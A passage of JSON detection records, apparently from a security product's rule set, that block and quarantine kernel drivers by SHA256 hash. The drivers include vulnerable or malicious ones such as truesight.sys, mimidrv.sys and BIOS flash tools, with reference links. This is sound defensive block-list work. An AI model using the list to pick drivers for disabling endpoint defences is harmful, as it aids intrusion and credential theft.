"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "83cc4a85fce0635bed938e2ae866011c004192e0acdf1b1bb5ea03cfaa34fe3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ed1d32f-d554-5b7f-b87e-6942118e4c52", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495151Z", + "creation_date": "2026-03-23T11:45:31.495153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "952b5e5ef69cf66a84baa52a13998ca5a038e51b6b31a6d281ee78eede0b9f30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ed7a61e-f252-50e1-b76f-b4eb1c1cc9a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142650Z", + "creation_date": "2026-03-23T11:45:32.142653Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31ce60480166e9ebef758b66f770f3fea86dd429da27fc5eed755c3d8c4e20fa", 
+ "comment": "KingSoft Antivirus Security System Driver (aka ksapi64.sys and ksapi64_del.sys) [https://github.com/BlackSnufkin/BYOVD/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5eeb0bfe-767c-5408-a79e-aba661fd678b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466185Z", + "creation_date": "2026-03-23T11:45:30.466188Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466197Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "818787057fc60ac8b957aa37d750aa4bace8e6a07d3d28b070022ee6dcd603ab", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f0a9012-e9bd-518e-870c-673e666967a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146764Z", + "creation_date": 
"2026-03-23T11:45:32.146766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c619a7fbb27940428b80129e0fa2d976fce52f93ab37667d2ca01330c6c561a5", + "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/bd6490c2-20ea-441e-803c-bc3b957dae4c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f0aabf7-a6b4-5b12-b668-97d9f57b8b89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616622Z", + "creation_date": "2026-03-23T11:45:29.616624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616633Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20f11a64bc4548f4edb47e3d3418da0f6d54a83158224b71662a6292bf45b5fb", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f162aad-7874-5e3d-b6d2-aa27ec1dcd86", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616133Z", + "creation_date": "2026-03-23T11:45:29.616135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616140Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cde02c7db90626bcfbfbbc1315d4ce18d4f15667fa57c16b9ac2b060507c62ad", + "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f208f91-7acf-5630-b8be-932b0e8104a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817711Z", + "creation_date": "2026-03-23T11:45:31.817713Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817721Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ef4a29303fadaebafa0370682a25ab16e9723ebb109c88d1c83764140c4256d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f31e738-5c01-57ff-ad46-1bddd804e8f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827160Z", + "creation_date": "2026-03-23T11:45:30.827162Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827168Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8b3af5ccbcc7ca3fdde7818e0c706fc490f06aa20fff90c79f270445759e3d7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f439300-d9ac-5abc-a628-053dd62b8304", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808595Z", + "creation_date": "2026-03-23T11:45:31.808597Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f41efd32d4ad9bbcb688c687d7b871c3f33fd5766e28aa3f27c723b48a56bcb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f4a8211-1645-53a6-a186-588ed22d504c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.469068Z", + "creation_date": "2026-03-23T11:45:30.469072Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469082Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "00231ea698565270bf9f542e70490b7a5c6740c2da6699ab548dca0a97ca3171", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f4aea1e-c8b7-5601-bf80-da58ad6a41c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606741Z", + "creation_date": "2026-03-23T11:45:29.606743Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c5732937c3ab5e0fd244cc1b820eaa1fb7d97110c213cd6b9dadebafe3ea853d", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f4b8d79-d903-50e6-9cb0-1a0c611fcb06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979325Z", + "creation_date": "2026-03-23T11:45:29.979327Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b932eab6c67f62f097a3249477ac46d80ddccdc52654f8674060b4ddf638e5d", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f549cd4-3ad9-58e6-a043-2cc5a63bef0f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480079Z", + "creation_date": "2026-03-23T11:45:31.480083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480093Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d77b2fd954fe46be027c78597c87fa320438665240b751d788033bb183ef7761", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f58814f-50a3-5724-9693-68be040bf957", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819847Z", + "creation_date": "2026-03-23T11:45:30.819849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819854Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb79b99db91dc965263bd2c10ec0f58c6b8f282e0273f40c4249831b74ffec3a", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f616c5c-e1b2-5b65-acfb-249f658be918", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466692Z", + "creation_date": "2026-03-23T11:45:30.466695Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466704Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9dc7beb60a0a6e7238fc8589b6c2665331be1e807b4d2b3ddd1c258dbbd3e2f7", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f722226-8d15-5d9c-8079-84811c5b3e6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828477Z", + "creation_date": "2026-03-23T11:45:31.828479Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828484Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ec7dca0815075f605a2887eae32def1d28cc09de4fac8b5033b3c0693ad210d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f72eaae-f6ae-52b6-9aa8-e6e2e7d82af1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604033Z", + "creation_date": "2026-03-23T11:45:29.604035Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604041Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dcb8df13141708f0dd470b5411c065f8ad21688daf424bd05c94eb6e63dd08aa", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f77e5b1-8eba-5463-8715-e4770c4745a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147917Z", + "creation_date": "2026-03-23T11:45:31.147919Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"1f7771ea769a351ee971b196b67cffd86afa90d7478f4e20f200b159099bcfcd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f7eeedd-6db3-5bf3-b18d-2d7c4b5099c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606421Z", + "creation_date": "2026-03-23T11:45:29.606423Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0dc57678ba8a87ece2b2ecf0f0fc6ea2366f3f11873f478f49c9b9df8b813288", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f821312-e930-59fd-ac81-43312c234e3d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452798Z", + "creation_date": "2026-03-23T11:45:30.452802Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452811Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7a2cd1dc110d014165c001ce65578da0c0c8d7d41cc1fa44f974e8a82296fc25", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f8e6708-c2d3-571a-b6ef-2e2f0451908f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809596Z", + "creation_date": "2026-03-23T11:45:31.809599Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809607Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "110e77c2a77d18067edafcee5c7fbd0c1240498f971e38acf5671800e4c3a667", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f9241e1-4b37-5803-afb0-06acb4d23593", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977834Z", + "creation_date": "2026-03-23T11:45:29.977836Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977842Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc", + "comment": "Vulnerable Kernel Driver (aka b4.sys) [https://www.loldrivers.io/drivers/d1441172-cc15-4a96-b782-f440bfb681e1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f927e47-26e1-59ca-b3d3-3cd5daa54b95", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142308Z", + "creation_date": "2026-03-23T11:45:31.142310Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142316Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b48564115c42432fccccba7018b6578c8ccc33da0c6b7d73f7150f0c4470e6e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f97d772-a77f-53bf-8978-2d31e85a5d11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141785Z", + "creation_date": "2026-03-23T11:45:31.141787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141793Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f426de2b6078727c9c7a9ac93ce9f8881cc8d2d489f80c419d9206408599764b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f98b9a1-ef14-5b38-a487-bd2041c122aa", + 
